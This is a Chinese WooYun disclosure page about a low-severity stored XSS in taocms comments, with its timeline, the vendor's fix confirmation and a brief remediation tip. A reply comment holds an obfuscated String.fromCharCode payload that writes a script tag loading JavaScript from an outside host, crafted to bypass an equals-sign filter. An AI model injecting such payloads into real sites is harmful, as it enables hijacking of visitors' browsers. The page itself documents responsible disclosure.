当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013267

漏洞标题:taocms评论鸡肋xss

相关厂商:taocms开源

漏洞作者: shack2

提交时间:2012-10-12 14:33

修复时间:2012-11-26 14:34

公开时间:2012-11-26 14:34

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-12: 细节已通知厂商并且等待厂商处理中
2012-10-12: 厂商已经确认,细节仅向厂商公开
2012-10-22: 细节向核心白帽子及相关领域专家公开
2012-11-01: 细节向普通白帽子公开
2012-11-11: 细节向实习白帽子公开
2012-11-26: 细节向公众公开

简要描述:

储存xss

详细说明:

发现以前版本可以xss发数据,最近更新的这个版本,评论过滤了等号(=),暂时没想到怎么发数据出去,谁知道,html中,怎么在没有等号的情况,能发送一次http请求

漏洞证明:

修复方案:

替换<>'"这4个字符一般都能防止xss了

版权声明:转载请注明来源 shack2@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-10-12 17:12

厂商回复:

十分感谢你的安全测试,新版本此过滤缺陷已经修复

最新状态:

2012-10-12:最新的安装包已经修复此问题


漏洞评价:

评论

  1. 2012-10-12 17:15 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    @taocms开源 刚请教朋友,知道怎么突破过滤了<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,115,104,97,99,107,50,46,111,114,103,47,116,101,115,116,46,106,115,32,62,60,47,115,99,114,105,112,116,62,34,41,59))</script>刚想去测试,你就修复了,这速度真快,抱歉,弹窗的事